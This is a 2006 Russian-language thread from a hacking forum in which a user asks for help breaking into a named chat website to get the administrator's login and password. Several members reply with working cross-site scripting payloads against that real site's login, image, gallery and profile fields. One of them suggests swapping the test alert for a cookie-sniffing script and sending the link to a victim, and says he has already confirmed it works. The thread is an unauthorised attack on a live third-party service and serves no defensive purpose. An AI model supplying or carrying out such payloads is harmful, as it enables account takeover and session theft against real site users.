Чаты Помогите взломать http://chat.russianamerica.com:8080

Discussion in 'Веб-уязвимости' started by kord, 4 Oct 2006.

  1. kord

    kord New Member

    Joined:
    4 Oct 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://chat.russianamerica.com:8080/ помогите узнать логин админа и код с уважением Автоматический гранатамёт Стечкина.
     
  2. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    первое че брасаеться в глаза это пасив на главной странице


    Code:
    http://chat.russianamerica.com:8080/login?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    ток пробел над убрать в document.cookie
    буду смотреть дальше...

    -- в профиле не фильтруються двойные кавычки
     
    #2 nc.STRIEM, 4 Oct 2006
    Last edited: 4 Oct 2006
    1 person likes this.
  3. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    вот и я нашел
    http://chat.russianamerica.com:8080/StPic?n='><script>alert(/Kaban/)</script>
    XSS эта вроде работает, только когда под ником сидишь
     
    #3 Kaban, 4 Oct 2006
    Last edited: 4 Oct 2006
    1 person likes this.
  4. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    ну вот те пожалуст!
    осталось заместо алерта подставить скрипт для сниффера и впарить комут ссылку! уже проверил работает!
     
    #4 nc.STRIEM, 5 Oct 2006
    Last edited: 5 Oct 2006
  5. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    вроде тоже проходит
    http://chat.russianamerica.com:8080/Gallery?s=%22%3E%3Cscript%3Ealert(/Kaban/)%3C/script%3E
     
  6. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Еще нашол в профиле полуактивную xss в поле Домашняя страничка: вставляеш
    Code:
    " onmouseover=javascript:alert(document.cookie) "
    
    при наведение срабатывает
     
    #6 nc.STRIEM, 5 Oct 2006
    Last edited: 5 Oct 2006
  7. kord

    kord New Member

    Joined:
    4 Oct 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Хакеры а что именно открываеться что то я не пойму что можно с этим делать и что логин и пароль админа не узнать?
     
  8. Kaban

    Kaban Elder - Старейшина

    Joined:
    19 Mar 2006
    Messages:
    248
    Likes Received:
    78
    Reputations:
    14
    вот в этой статье всё прекрасно описано что делать, как делать и зачем делать.
    http://forum.antichat.ru/thread20140.html
     
Loading...